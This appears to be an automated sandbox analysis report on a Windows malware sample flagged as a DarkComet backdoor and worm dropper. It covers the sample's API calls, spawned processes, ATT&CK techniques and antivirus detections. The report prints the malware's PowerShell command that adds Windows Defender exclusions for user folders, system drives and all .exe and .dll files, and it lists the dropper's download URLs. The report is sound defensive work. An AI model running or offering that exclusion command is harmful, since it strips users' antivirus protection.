                                Source: C:\Users\user\Desktop\._cache_uniformerede.exe API call chain: ExitProcess graph end node graph_7-4484
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exe API call chain: ExitProcess graph end node graph_7-4265
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe File opened: C:\Users\user
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe File opened: C:\Users\user\AppData
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe File opened: C:\Users\user\AppData\Roaming
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_00426548 GetSystemInfo,6_2_00426548
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_004099E0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,6_2_004099E0
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_00406018 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,6_2_00406018
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_00409B1C FindFirstFileA,GetLastError,6_2_00409B1C
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exe Code function: 7_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_00405D74
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exe Code function: 7_2_0040290B FindFirstFileW,7_2_0040290B
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exe Code function: 7_2_0040699E FindFirstFileW,FindClose,7_2_0040699E
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_004099E0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,9_2_004099E0
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_00409B1C FindFirstFileA,GetLastError,9_2_00409B1C
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_00406018 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,9_2_00406018
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_00406018 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,12_2_00406018
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_004099E0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,12_2_004099E0
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_00409B1C FindFirstFileA,GetLastError,12_2_00409B1C
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_004730FC LoadLibraryA,GetProcAddress,SHGetSpecialFolderLocation,SHGetPathFromIDList,SHGetSpecialFolderLocation,SHGetPathFromIDList,6_2_004730FC
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Process queried: DebugPort
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_00422BCC VirtualAlloc,LdrInitializeThunk,LdrInitializeThunk,9_2_00422BCC
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe Code function: 0_2_004014A5 EntryPoint,memset,SetUnhandledExceptionFilter,__set_app_type,_controlfp,__argc,__argv,_environ,_environ,__argv,__getmainargs,__argc,__argv,_environ,__argc,__argc,exit,0_2_004014A5

                                HIPS / PFW / Operating System Protection Evasion

                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
                                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exitJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\uniformerede.exe "C:\Users\user\AppData\Local\Temp\uniformerede.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeProcess created: C:\Users\user\Desktop\._cache_uniformerede.exe "C:\Users\user\Desktop\._cache_uniformerede.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00473490 ShellExecuteEx,Sleep,WaitForSingleObject,6_2_00473490
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,6_2_004061D0
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: GetLocaleInfoA,GetACP,6_2_0040E088
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,6_2_004062DC
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: GetLocaleInfoA,6_2_0040C964
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: GetLocaleInfoA,6_2_0040C9B0
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: GetLocaleInfoA,6_2_00406AC6
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: GetLocaleInfoA,6_2_00406AC8
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,9_2_004061D0
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: GetLocaleInfoA,GetACP,9_2_0040E088
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,9_2_004062DC
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: GetLocaleInfoA,9_2_0040C964
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: GetLocaleInfoA,9_2_0040C9B0
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: GetLocaleInfoA,9_2_00406AC6
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: GetLocaleInfoA,9_2_00406AC8
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,12_2_004061D0
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: GetLocaleInfoA,GetACP,12_2_0040E088
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,12_2_004062DC
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: GetLocaleInfoA,12_2_0040C964
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: GetLocaleInfoA,12_2_0040C9B0
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: GetLocaleInfoA,12_2_00406AC6
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: GetLocaleInfoA,12_2_00406AC8
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_0040B2D4 GetLocalTime,6_2_0040B2D4
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_0047E020 GetTimeZoneInformation,6_2_0047E020
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_00472E58 GetUserNameA,6_2_00472E58
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_00446564 GetVersion,6_2_00446564
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: cmd.exe /C 6_2_00475384
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: cmd.exe /C 9_2_00475384
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: cmd.exe /C 12_2_00475384
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_0047C7BC bind,9_2_0047C7BC
                                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                                1
                                Replication Through Removable Media
                                1
                                Native API
                                1
                                DLL Side-Loading
                                1
                                Exploitation for Privilege Escalation
                                1
                                Disable or Modify Tools
                                11
                                Input Capture
                                2
                                System Time Discovery
                                1
                                Replication Through Removable Media
                                1
                                Archive Collected Data
                                Exfiltration Over Other Network Medium4
                                Ingress Tool Transfer
                                Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                                System Shutdown/Reboot
                                Default Accounts1
                                Command and Scripting Interpreter
                                1
                                Windows Service
                                1
                                DLL Side-Loading
                                1
                                Deobfuscate/Decode Files or Information
                                LSASS Memory1
                                Peripheral Device Discovery
                                Remote Desktop Protocol1
                                Screen Capture
                                Exfiltration Over Bluetooth11
                                Encrypted Channel
                                Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                                Domain Accounts | At (Linux) | Logon Script (Windows) | 1 Access Token Manipulation | 2 Obfuscated Files or Information | Security Account Manager | 1 Account Discovery | SMB/Windows Admin Shares | 11 Input Capture | Automated Exfiltration | 3 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                                Local Accounts | At (Windows) | Logon Script (Mac) | 1 Windows Service | 1 Software Packing | NTDS | 4 File and Directory Discovery | Distributed Component Object Model | 2 Clipboard Data | Scheduled Transfer | 24 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud
                                Cloud Accounts | Cron | Network Logon Script | 11 Process Injection | 1 DLL Side-Loading | LSA Secrets | 136 System Information Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings
                                Replication Through Removable Media | Launchd | Rc.common | Rc.common | 111 Masquerading | Cached Domain Credentials | 1 Query Registry | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features
                                External Remote Services | Scheduled Task | Startup Items | Startup Items | 31 Virtualization/Sandbox Evasion | DCSync | 23 Security Software Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact
                                Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 Access Token Manipulation | Proc Filesystem | 1 Process Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue
                                Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | 11 Process Injection | /etc/passwd and /etc/shadow | 31 Virtualization/Sandbox Evasion | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction
                                Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | 11 Application Window Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact
                                Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Right-to-Left Override | Input Capture | 1 System Owner/User Discovery | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | Service Stop
                                Compromise Software Supply Chain | Unix Shell | Launchd | Launchd | Rename System Utilities | Keylogging | 1 Remote System Discovery | Component Object Model and Distributed COM | Screen Capture | Exfiltration over USB | DNS | Inhibit System Recovery
                                [Behavior graph not reproduced. Behavior Graph ID: 634939; Sample: SecuriteInfo.com.Variant.Fa...; Start date: 27/05/2022; Architecture: WINDOWS; Score: 100]

                                Source | Detection | Scanner | Label | Link
                                SecuriteInfo.com.Variant.FakeAlert.2.24488.exe | 62% | Virustotal | | Browse
                                SecuriteInfo.com.Variant.FakeAlert.2.24488.exe | 59% | ReversingLabs | Win32.Backdoor.DarkComet |
                                SecuriteInfo.com.Variant.FakeAlert.2.24488.exe | 100% | Avira | TR/Dropper.Gen |
                                Source | Detection | Scanner | Label | Link
                                C:\Users\user\AppData\Local\Temp\uniformerede.exe | 100% | Avira | WORM/Dldr.Agent.gqrxn |
                                C:\Users\user\AppData\Local\Temp\uniformerede.exe | 100% | Avira | W2000M/Dldr.Agent.17651006 |
                                C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe | 100% | Avira | WORM/Dldr.Agent.gqrxn |
                                C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe | 100% | Avira | TR/Dropper.Gen |
                                C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe | 100% | Avira | W2000M/Dldr.Agent.17651006 |
                                C:\Users\user\AppData\Local\Temp\YC9w8Aif.exe | 100% | Avira | WORM/Dldr.Agent.gqrxn |
                                C:\Users\user\AppData\Local\Temp\YC9w8Aif.exe | 100% | Avira | W2000M/Dldr.Agent.17651006 |
                                C:\Users\user\Documents\DUUDTUBZFW\~$cache1 | 100% | Avira | WORM/Dldr.Agent.gqrxn |
                                C:\Users\user\Documents\DUUDTUBZFW\~$cache1 | 100% | Avira | W2000M/Dldr.Agent.17651006 |
                                C:\Users\user\AppData\Local\Temp\RCXF979.tmp | 100% | Avira | WORM/Dldr.Agent.gqrxn |
                                C:\Users\user\AppData\Local\Temp\RCXF979.tmp | 100% | Avira | TR/Dropper.Gen |
                                C:\Users\user\AppData\Local\Temp\RCXF979.tmp | 100% | Avira | W2000M/Dldr.Agent.17651006 |
                                C:\ProgramData\Synaptics\RCXCD96.tmp | 100% | Avira | WORM/Dldr.Agent.gqrxn |
                                C:\ProgramData\Synaptics\RCXCD96.tmp | 100% | Avira | W2000M/Dldr.Agent.17651006 |
                                C:\ProgramData\Synaptics\Synaptics.exe | 100% | Avira | WORM/Dldr.Agent.gqrxn |
                                C:\ProgramData\Synaptics\Synaptics.exe | 100% | Avira | W2000M/Dldr.Agent.17651006 |
                                C:\Users\user\AppData\Local\Temp\RCXDA77.tmp | 100% | Avira | WORM/Dldr.Agent.gqrxn |
                                C:\Users\user\AppData\Local\Temp\RCXDA77.tmp | 100% | Avira | TR/Dropper.Gen |
                                C:\Users\user\AppData\Local\Temp\RCXDA77.tmp | 100% | Avira | W2000M/Dldr.Agent.17651006 |
                                C:\Users\user\AppData\Local\Temp\uniformerede.exe | 100% | Joe Sandbox ML | |
                                C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe | 100% | Joe Sandbox ML | |
                                C:\Users\user\AppData\Local\Temp\YC9w8Aif.exe | 100% | Joe Sandbox ML | |
                                C:\Users\user\Documents\DUUDTUBZFW\~$cache1 | 100% | Joe Sandbox ML | |
                                C:\Users\user\AppData\Local\Temp\RCXF979.tmp | 100% | Joe Sandbox ML | |
                                C:\ProgramData\Synaptics\RCXCD96.tmp | 100% | Joe Sandbox ML | |
                                C:\ProgramData\Synaptics\Synaptics.exe | 100% | Joe Sandbox ML | |
                                C:\Users\user\AppData\Local\Temp\RCXDA77.tmp | 100% | Joe Sandbox ML | |
                                C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll | 3% | Metadefender | | Browse
                                C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll | 0% | ReversingLabs | |
                                Source | Detection | Scanner | Label | Link | Download
                                0.2.SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.400000.0.unpack | 100% | Avira | TR/Dropper.Gen | | Download File
                                9.0.Synaptics.exe.400000.4.unpack | 100% | Avira | WORM/Dldr.Agent.gqrxn | | Download File
                                9.0.Synaptics.exe.400000.4.unpack | 100% | Avira | W2000M/Dldr.Agent.17651006 | | Download File
                                12.2.Synaptics.exe.400000.0.unpack | 100% | Avira | WORM/Dldr.Agent.gqrxn | | Download File
                                12.2.Synaptics.exe.400000.0.unpack | 100% | Avira | W2000M/Dldr.Agent.17651006 | | Download File
                                9.2.Synaptics.exe.400000.0.unpack | 100% | Avira | WORM/Dldr.Agent.gqrxn | | Download File
                                9.2.Synaptics.exe.400000.0.unpack | 100% | Avira | W2000M/Dldr.Agent.17651006 | | Download File
                                6.0.uniformerede.exe.4b8e14.1.unpack | 100% | Avira | TR/Patched.Ren.Gen | | Download File
                                0.0.SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.400000.0.unpack | 100% | Avira | TR/Dropper.Gen | | Download File
                                6.2.uniformerede.exe.400000.0.unpack | 100% | Avira | WORM/Dldr.Agent.gqrxn | | Download File
                                6.2.uniformerede.exe.400000.0.unpack | 100% | Avira | W2000M/Dldr.Agent.17651006 | | Download File
                                9.0.Synaptics.exe.400000.2.unpack | 100% | Avira | WORM/Dldr.Agent.gqrxn | | Download File
                                9.0.Synaptics.exe.400000.2.unpack | 100% | Avira | W2000M/Dldr.Agent.17651006 | | Download File
                                0.2.SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.a07634.1.unpack | 100% | Avira | TR/Patched.Ren.Gen | | Download File
                                9.0.Synaptics.exe.400000.0.unpack | 100% | Avira | WORM/Dldr.Agent.gqrxn | | Download File
                                9.0.Synaptics.exe.400000.0.unpack | 100% | Avira | W2000M/Dldr.Agent.17651006 | | Download File
                                6.2.uniformerede.exe.4b8e14.1.unpack | 100% | Avira | TR/Patched.Ren.Gen | | Download File
                                6.0.uniformerede.exe.400000.0.unpack | 100% | Avira | WORM/Dldr.Agent.gqrxn | | Download File
                                6.0.uniformerede.exe.400000.0.unpack | 100% | Avira | W2000M/Dldr.Agent.17651006 | | Download File
                                12.0.Synaptics.exe.400000.0.unpack | 100% | Avira | WORM/Dldr.Agent.gqrxn | | Download File
                                12.0.Synaptics.exe.400000.0.unpack | 100% | Avira | W2000M/Dldr.Agent.17651006 | | Download File
                                9.0.Synaptics.exe.400000.3.unpack | 100% | Avira | WORM/Dldr.Agent.gqrxn | | Download File
                                9.0.Synaptics.exe.400000.3.unpack | 100% | Avira | W2000M/Dldr.Agent.17651006 | | Download File
                                9.0.Synaptics.exe.400000.1.unpack | 100% | Avira | WORM/Dldr.Agent.gqrxn | | Download File
                                9.0.Synaptics.exe.400000.1.unpack | 100% | Avira | W2000M/Dldr.Agent.17651006 | | Download File
                                No Antivirus matches
                                Source | Detection | Scanner | Label | Link
                                http://xred.site50.net/syn/SSLLibrary.dlX | 0% | Avira URL Cloud | safe |
                                https://roaming.edog. | 0% | URL Reputation | safe |
                                https://cdn.entity. | 0% | URL Reputation | safe |
                                https://powerlift.acompli.net | 0% | URL Reputation | safe |
                                https://rpsticket.partnerservices.getmicrosoftkey.com | 0% | URL Reputation | safe |
                                https://cortana.ai | 0% | URL Reputation | safe |
                                https://api.aadrm.com/ | 0% | URL Reputation | safe |
                                https://ofcrecsvcapi-int.azurewebsites.net/ | 0% | URL Reputation | safe |
                                http://xred.site50.net/syn/SUpdate.iniZ | 0% | Avira URL Cloud | safe |
                                http://xred.site50.net/syn/SUpdate.ini | 3% | Virustotal | | Browse
                                http://xred.site50.net/syn/SUpdate.ini | 0% | Avira URL Cloud | safe |
                                https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h | 0% | Avira URL Cloud | safe |
                                https://res.getmicrosoftkey.com/api/redemptionevents | 0% | URL Reputation | safe |
                                https://powerlift-frontdesk.acompli.net | 0% | URL Reputation | safe |
                                https://officeci.azurewebsites.net/api/ | 0% | URL Reputation | safe |
                                https://store.office.cn/addinstemplate | 0% | URL Reputation | safe |
                                https://api.aadrm.com | 0% | URL Reputation | safe |
                                https://dev0-api.acompli.net/autodetect | 0% | URL Reputation | safe |
                                https://www.odwebp.svc.ms | 0% | URL Reputation | safe |
                                http://xred.site50.net/syn/Synaptics.rar | 0% | Avira URL Cloud | safe |
                                https://api.addins.store.officeppe.com/addinstemplate | 0% | URL Reputation | safe |
                                https://dataservice.o365filtering.com/ | 0% | URL Reputation | safe |
